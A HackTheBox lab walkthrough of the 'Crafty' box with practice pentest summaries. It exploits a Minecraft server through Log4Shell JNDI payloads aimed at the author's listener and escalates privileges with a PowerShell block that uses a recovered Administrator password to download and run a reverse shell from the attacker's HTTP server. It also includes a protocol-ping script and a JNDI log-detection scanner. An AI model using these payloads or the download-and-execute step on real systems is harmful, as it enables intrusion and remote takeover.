Crafty | HackTheBox Walkthrough + Technical/Management Summaries

James Jarvis
Feb 16, 2024


Introduction

Welcome to my most chaotic walkthrough (so far). I both love and hate this box in equal measure. I strongly suggest you do not use this for the ‘answer’. Use it to help learn the process, not for an easy few virtual points on a virtual website which is meaningless.

This ‘Walkthrough’ will provide my full process. It will include my many mistakes alongside (eventually) the correct solution. I encourage you to not copy my exact actions, but to use this to help you understand a different approach.

I have kept my errors in, alongside any rabbit holes I fell into. I have kept them for 2 reasons:

  • It helps my learning process to write up my mistakes/process
  • It helps show others like me that sometimes the answer isn’t ‘obvious’ or easily found.

At the end, I will include a Technical and Management summary. This is to give myself practice for my own pentest reports — you may find it useful to see how I approach these.

This is regarded as an easy box, but I found it quite challenging.

Without further ado, let’s get started.

Crafty

First, let’s do a basic nmap scan on all ports.

nmap 10.10.11.249 -p-

We should do -p0- to include port 0 too, but I realised my error too late. Hopefully this won’t be an issue..!

Minecraft, well that explains the box name!

Please note I should have exported this to a text file — I have since done this into a specially created folder for this box.

We will return to the Minecraft port shortly, but for now, let’s explore the website.
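The version string nmap reports for port 25565 comes from the server list ping that every Minecraft client performs: a handshake packet (next state 1) followed by an empty status request, answered with a JSON blob that includes the server version. The following script is an added example, not code from the original post or from HTB; it builds and parses those framed packets so you can see exactly what a 1.16.5 server volunteers to anyone who connects. The protocol number 754 is the one documented for 1.16.4/1.16.5; the sample response bytes are constructed here, not captured from the box, so the parser can be exercised offline.

```python
import json
import socket
import struct

# Protocol number a 1.16.5 server expects (from the public protocol docs).
PROTOCOL_1_16_5 = 754


def encode_varint(value: int) -> bytes:
    """Encode a non-negative int as a Minecraft VarInt (7 bits per byte, LSB first)."""
    out = bytearray()
    while True:
        byte = value & 0x7F
        value >>= 7
        if value:
            out.append(byte | 0x80)
        else:
            out.append(byte)
            return bytes(out)


def decode_varint(buf: bytes, pos: int = 0):
    """Decode a VarInt starting at buf[pos]; returns (value, position after it)."""
    result, shift = 0, 0
    while True:
        byte = buf[pos]
        pos += 1
        result |= (byte & 0x7F) << shift
        if not byte & 0x80:
            return result, pos
        shift += 7
        if shift > 35:
            raise ValueError("VarInt too long")


def encode_string(s: str) -> bytes:
    """Protocol string: VarInt byte length followed by UTF-8 data."""
    data = s.encode("utf-8")
    return encode_varint(len(data)) + data


def frame(packet_id: int, payload: bytes) -> bytes:
    """Prefix packet id + payload with the VarInt length the protocol requires."""
    body = encode_varint(packet_id) + payload
    return encode_varint(len(body)) + body


def build_handshake(host: str, port: int, protocol: int = PROTOCOL_1_16_5) -> bytes:
    """Handshake packet (id 0x00) asking for the status state (next state = 1)."""
    payload = (encode_varint(protocol) + encode_string(host)
               + struct.pack(">H", port) + encode_varint(1))
    return frame(0x00, payload)


def build_status_request() -> bytes:
    """Status request is packet id 0x00 with an empty payload."""
    return frame(0x00, b"")


def parse_status_response(raw: bytes) -> dict:
    """Parse a framed status response (packet id 0x00 + JSON string) into a dict."""
    _length, pos = decode_varint(raw, 0)
    packet_id, pos = decode_varint(raw, pos)
    if packet_id != 0x00:
        raise ValueError(f"unexpected packet id {packet_id:#x}")
    str_len, pos = decode_varint(raw, pos)
    return json.loads(raw[pos:pos + str_len].decode("utf-8"))


def advertised_version(raw: bytes) -> str:
    """The version name the server hands out before any authentication."""
    return parse_status_response(raw)["version"]["name"]


def ping_server(host: str, port: int = 25565, timeout: float = 5.0) -> dict:
    """Live check against a server you operate: handshake + status request, read the reply."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_handshake(host, port) + build_status_request())
        buf = b""
        while True:
            chunk = sock.recv(4096)
            if not chunk:
                break
            buf += chunk
            try:
                length, hdr = decode_varint(buf, 0)
            except IndexError:      # length prefix not complete yet
                continue
            if len(buf) >= hdr + length:
                break
        return parse_status_response(buf)


# Constructed sample response (not captured from the box) in the shape a
# 1.16.5 server returns.
SAMPLE_RESPONSE = frame(0x00, encode_string(json.dumps({
    "version": {"name": "1.16.5", "protocol": 754},
    "players": {"max": 20, "online": 0},
    "description": {"text": "A Minecraft Server"},
})))

if __name__ == "__main__":
    print("advertised version:", advertised_version(SAMPLE_RESPONSE))
```

Run `ping_server("your.server", 25565)` against a server you administer to confirm what it advertises; the version in that JSON is what lets a scanner map the port straight to a vulnerable Log4j build, which is why the summaries below treat the verbose banner as a finding in its own right.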

Let’s add the website to our /etc/hosts file:

Straight away, we are greeted with a subdomain:

The source code provides some directories which could be of note — or could not be.

Let’s explore play.crafty.htb

Well, after adding it to our hosts file, it just redirects back.

Could be an error on my part, but before I go any further I’m going to enumerate the services found in the nmap scan:

Always worth trying to find an easy win:

Alas…

Some further exploring of directories and clues in source code, and I found this:

Nothing useful here, but when I try to go to /img:

Well, I have Minecraft, like most people do (even if you want to pretend to be too cool for it…), so let’s see if I can connect to the server!

Need to download the correct version. I imagine connecting via the IP or play.crafty.htb should work.

I then realised I didn’t have Minecraft on my VM, which means the VPN isn’t connected. Hm.

Well, did some research and downloaded TLauncher. Probably also installed a bunch of malware too. I don’t recommend this box purely for this reason.

Anyway, let’s carry on and cry together when the ransomware strikes.

I’m in the server — feels dodgy to be honest, but alas.

Some online enumeration suggests there is a vulnerability in 1.16.5 with log4j.

OK. So this is quite easy to exploit.

I found this payload:

${jndi:ldap://someaddresshere/param1=value1}

Change someaddresshere to my ip and port, set up a listener, and this is what happens:

Unfortunately, it was very unstable and kicked me out before I could screenshot my process — but as you can see, I gained a connection. Now to find out how to regain it.

Just need to work out how to input commands.

My input command/payload could also be incorrect.

I found a variant on the POC here:

With that in mind, let’s give this one a go.

Well, I had issues with space somehow. Reset my VM and now it won’t work. So don’t install TLauncher, skip this box.

**Please note at this stage I reinstalled Kali fresh. I am now searching for a method without needing a MC client.**

Let’s try good ol’ ‘reliable’ Telnet:

That wasn’t working, so I looked for a CLI for minecraft, and surprisingly found one.

git clone https://github.com/MCCTeam/Minecraft-Console-Client.git --recursive

Well, if you get that to work, do let me know. I had issues with .NET versions not correctly updating. I’m sure that is a way which works, but alas, I failed there too.

Admitting defeat and downloading Minecraft

At this point, I have spent too long on this box trying to work out the non-client solution, which is apparently ‘easier’ than this method.

So let’s revisit my earlier ideas and improve them.

I downloaded the Debian files from the website and installed it.

Reset my long forgotten password…

And we return… This time legitimately.

As with all GitHub pages, the readme doc is always a good source of information:

By default, the payload (which you should always look through before initiating…) is set to /bin/sh. We know from our scans that this is a Windows machine, so let’s make sure it is Windows ‘friendly’:

Alas, similar issues to before, and I can’t get this POC to work. I need to find the same java version, somehow.

I found the download links https://www.oracle.com/java/technologies/javase/javase8-archive-downloads.html

I downloaded according to the previously linked POC. I had to make an account — aside from the email, you can make it up — no checks there. You could also use 10 minute mail too, if you like.

Let’s move it to the right folder and unzip it.

Let’s now run our command from earlier:

NOW we are getting somewhere!

Let’s send the ‘send me’ on the MC server:

${jndi:ldap://10.10.14.15:1389/a}

Oh that’s a beautiful sight to behold, at last!
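Because the lookup is triggered by a player simply typing the string into chat, the server’s own log (`logs/latest.log`, which the post digs through later) is where a defender sees the attempt first. The script below is an added example, not code from the original post: it scans Minecraft-style log lines for Log4j lookups, collapsing the nesting tricks that were widely used to dodge a naive `${jndi:` grep (`${lower:j}`, `${upper:j}` and `${anything:-j}` default values) before checking for a `jndi:<scheme>:` lookup. The log lines are constructed samples and the 198.51.100.7 address is a documentation-range placeholder, not the box.

```python
import re

# Innermost ${...} lookup, i.e. one with no nested ${ or } inside it.
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# A lookup that survived de-obfuscation is wrapped in \x00{ ... }\x00 markers;
# a jndi:<scheme>: lookup in that position is the indicator.
JNDI_LOOKUP = re.compile(r"\x00\{jndi:[a-z]+:", re.IGNORECASE)
MAX_ROUNDS = 50


def _resolve(expr: str) -> str:
    """Evaluate one innermost lookup the way the common obfuscations rely on."""
    if ":-" in expr:                      # ${anything:-default}  ->  default
        return expr.rsplit(":-", 1)[1]
    kind, _, arg = expr.partition(":")
    if kind.lower() == "lower":           # ${lower:J}  ->  j
        return arg.lower()
    if kind.lower() == "upper":           # ${upper:j}  ->  J
        return arg.upper()
    # Not an obfuscation wrapper: keep the content but replace the ${ } with
    # markers so the substitution loop terminates.
    return "\x00{" + expr + "}\x00"


def _collapse(text: str) -> str:
    """Resolve nested lookups from the inside out until nothing changes."""
    for _ in range(MAX_ROUNDS):
        new = INNER_LOOKUP.sub(lambda m: _resolve(m.group(1)), text)
        if new == text:
            break
        text = new
    return text


def normalize(text: str) -> str:
    """Human-readable de-obfuscated form of a line (markers stripped)."""
    return _collapse(text).replace("\x00", "")


def is_jndi_lookup(text: str) -> bool:
    """True if the line contains a lookup that resolves to jndi:<scheme>:..."""
    return JNDI_LOOKUP.search(_collapse(text)) is not None


def scan_log(lines):
    """Return (line_number, normalized_line) for every line carrying a JNDI lookup."""
    findings = []
    for n, line in enumerate(lines, 1):
        if is_jndi_lookup(line):
            findings.append((n, normalize(line)))
    return findings


# Constructed sample log lines in the latest.log chat format.
SAMPLE_LOG = [
    "[16:02:11] [Server thread/INFO]: <steve> hello everyone",
    "[16:02:30] [Server thread/INFO]: <alex> ${jndi:ldap://198.51.100.7:1389/a}",
    "[16:02:45] [Server thread/INFO]: <alex> ${${lower:j}ndi:${lower:l}dap://198.51.100.7:1389/a}",
    "[16:03:01] [Server thread/INFO]: <alex> ${${env:NOPE:-j}${::-n}di:rmi://198.51.100.7:1099/b}",
    "[16:03:20] [Server thread/INFO]: <steve> that {jndi:ldap:} text is just a joke",
]

if __name__ == "__main__":
    for lineno, shown in scan_log(SAMPLE_LOG):
        print(f"line {lineno}: {shown}")
```

Point `scan_log` at the real `latest.log` (and the rotated `.log.gz` files) to find when the first attempt arrived and from which player name; the fifth sample line shows why the check keys on an actual `${...}` lookup rather than on the bare word. Detection is only the alerting side: the fix remains the one the summaries below give, patching or upgrading the server so the lookup is never evaluated.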

Let’s find the first flag — let’s check the usual place(s) for it.

Awesome, now let’s find root!

Let’s check the logs:

Interesting information, but not what we want.

Found an interesting file in Plugins, but couldn’t figure out a way to open it. I used wmic product to list installed programs to look for anything of use:

Further enumeration of the machine, looking for a simple privesc:

Trying to get winPEAS across:

Apparently nothing matches, so I’m not sure what is going wrong here.

Trying to extract other logs:

Converted to PowerShell (just type in powershell) and tried to set up a simple HTTP server to download files across.

Forever hanging….

I decided to take a break from this box and come back to it the following day.

We were previously exploring the plugins folder. I downloaded this by gaining a reverse shell via meterpreter. The process of which is shown below:

Using hacktools, I found a way to get my reverse shell onto the machine — remember, the point of this is to get the plugin folder off their machine. Absolute faff to do so!

I set up a simple http.server on my machine and downloaded my reverse shell onto the Minecraft server.

I found out about Hack Tools, a web browser extension that gives some great tools for this.

Let’s use the cmd compatible command. I will edit it in notepad to the correct command for ease. Note: The second ‘shell.exe’ is the output name for the file.

Customise the payload accordingly. Note: The second ‘shell.exe’ is the output file name.

Let’s run the handler and start the reverse shell:

PLEASE NOTE: I had issues running the reverse.exe in the default server directory. /logs worked fine. This could be a low level filter.

Let’s now download the java file. If we do not find anything here, we could explore other files too.

We can view this with JD-gui. This isn’t default Kali but can be easily installed if needed:

Opening it up, I import the playcount file and explore. After checking each file, I found a string of letters and numbers that could resemble a password:

Now to work out how to use this password.

I continued my research. I found that a good route would be to try and upload a payload to the machine to execute an admin shell.

We know we can access PowerShell, so let’s try a PowerShell exploit. To make this, I could spend years learning the intricacies of PowerShell — or use a reverse shell generator.

I copy/pasted this payload onto my local machine into a nano file I aptly titled: rev.ps1 — note the extension. Since this will be a PowerShell exploit, it needs to be .ps1.

I tried runas commands and other elevation commands with no success, which means we need to try and run as admin within a different command.

After research, I found these commands with variables that could work:

# Build a credential object for the Administrator account from the password recovered from the plugin
$SecPass = ConvertTo-SecureString 's67u84zKq8IXw' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('Administrator', $SecPass)
# Start a new PowerShell as Administrator that fetches rev.ps1 from our HTTP server and runs it in memory
Start-Process -FilePath "powershell" -ArgumentList "IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.15:7777/rev.ps1')" -Credential $cred

We are setting variables to access the admin account. With this, we are going to start PowerShell as Administrator, download our reverse shell and execute it. I have already changed it for my details — you may need to adjust accordingly.

Trying to juggle lots of listeners is a challenge… got there eventually.

From there, you will find the flag in a common HTB flag location.

And there we go, my most chaotic walkthrough so far — I excluded a lot of my troubles, too…

Below are some rudimentary Management and Technical Summaries. The point here is for my own personal practice at writing them. As a Pentester, you need to be able to write reports — not just get flags!

Management Summary

This test was conducted 14th February — 15th February 2024. Only the target in scope was explored, 10.10.11.249, http://crafty.htb.

A webpage and Minecraft server were found. The biggest vulnerability is the Minecraft server, whose version is disclosed by a simple scan. The version identified, 1.16.5, has a critical vulnerability which can be exploited with ease, as can be seen in this report. This jeopardises user Confidentiality, and can put the Integrity and Availability of the server at risk. Best practice dictates the server is taken down until either a patch can be installed or a newer version can be installed.

Furthermore, the webpage uses HTTP, which is not considered secure. HTTPS would improve the website security.

Technical Summary

This test was conducted 14th February — 15th February 2024. Only the target in scope was explored, 10.10.11.249, http://crafty.htb.

An HTTP webpage and Minecraft server were identified with an nmap scan. The scan showed the web server is running IIS 10.0 — exposing the IIS version is not best practice. Service versions were verbose, which allowed for easy enumeration of vulnerabilities. The Minecraft server on port 25565 was identified as v1.16.5, which has known Log4j vulnerabilities, as documented under CVE-2021-44228. This vulnerability allows users on the server to type in a simple payload to gain a shell on the server. Whilst some permissions restrict damage, a method exists which allows privilege escalation to administrator rights. This jeopardises user Confidentiality, and can put the Integrity and Availability of the server at risk. Best practice dictates either an immediate patch or an update to the latest version.

A webpage was also found using HTTP. Best practice dictates that HTTPS is used to ensure user and server data is encrypted, which minimises the risk and damage of a MITM attack or similar. Within the source code, some default comments have been left in. Best practice dictates that these are removed, alongside any other coding artifacts.

Concluding Remarks

A difficult box juggling many listeners. I hope you enjoyed this explanation and summaries.

Constructive feedback welcome.

Edit 1: I was listening to a podcast which discussed a similar vulnerability regarding log4j exploitation through log files:
